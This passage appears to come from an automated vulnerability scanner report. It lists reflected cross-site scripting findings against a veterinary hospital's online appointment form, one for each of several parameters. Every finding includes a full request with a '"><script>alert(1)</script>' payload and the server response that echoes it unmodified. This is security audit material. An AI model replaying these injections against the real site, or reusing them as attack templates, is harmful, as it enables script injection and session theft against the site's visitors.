GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=8c1c6"><script>alert(1)</script>979dba9c0db&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:38 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=gn0lqn96h1dui1eed4jku5k8m6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input name="date1" id="date1" type="text" size="20" maxlength="50" value="8c1c6"><script>alert(1)</script>979dba9c0db" class="datepicker" />
...[SNIP]...

2.96. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [date2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the date2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96695"><script>alert(1)</script>9ca6b41fe54 was submitted in the date2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=96695"><script>alert(1)</script>9ca6b41fe54&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:42 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=m28f2rol7ucndmddriq23vq4j7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input name="date2" id="date2" type="text" size="20" maxlength="50" value="96695"><script>alert(1)</script>9ca6b41fe54" class="datepicker" />
...[SNIP]...

2.97. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [date3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the date3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99fca"><script>alert(1)</script>838dd1f40b2 was submitted in the date3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=99fca"><script>alert(1)</script>838dd1f40b2&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:53 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=4slqhv122b9dscf15gqhml0ng4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input name="date3" id="date3" type="text" size="20" maxlength="50" value="99fca"><script>alert(1)</script>838dd1f40b2" class="datepicker" />
...[SNIP]...

2.98. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [doctor parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the doctor request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23546"><script>alert(1)</script>3e62334127d was submitted in the doctor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=23546"><script>alert(1)</script>3e62334127d&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:57 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=rbfveb3tt0865o46p3m6n44jl1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
pe="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=23546"><script>alert(1)</script>3e62334127d&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&tim
...[SNIP]...

2.99. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [email parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15a16"><script>alert(1)</script>b7c615c11f4 was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=15a16"><script>alert(1)</script>b7c615c11f4&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:02 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=e4559his7rbov2pr83025uc590; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input name="email" id="email" type="text" size="40" maxlength="255" value="15a16"><script>alert(1)</script>b7c615c11f4" />
...[SNIP]...

2.100. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [fname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the fname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21ff1"><script>alert(1)</script>d1a004b4a7d was submitted in the fname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=21ff1"><script>alert(1)</script>d1a004b4a7d&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:06 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=t6737mmn0l66ej6a3kul5vm5e1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input name="fname" id="fname" type="text" size="30" class="req" maxlength="50" value="21ff1"><script>alert(1)</script>d1a004b4a7d" />
...[SNIP]...

2.101. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [guid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/new-york-veterinary-hospital/appt.html

Issue detail

The value of the guid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55bce"><script>alert(1)</script>8c1dce1f08e was submitted in the guid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=55bce"><script>alert(1)</script>8c1dce1f08e&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:12 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=r124nb41s1ua1s8prghmllc3s0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
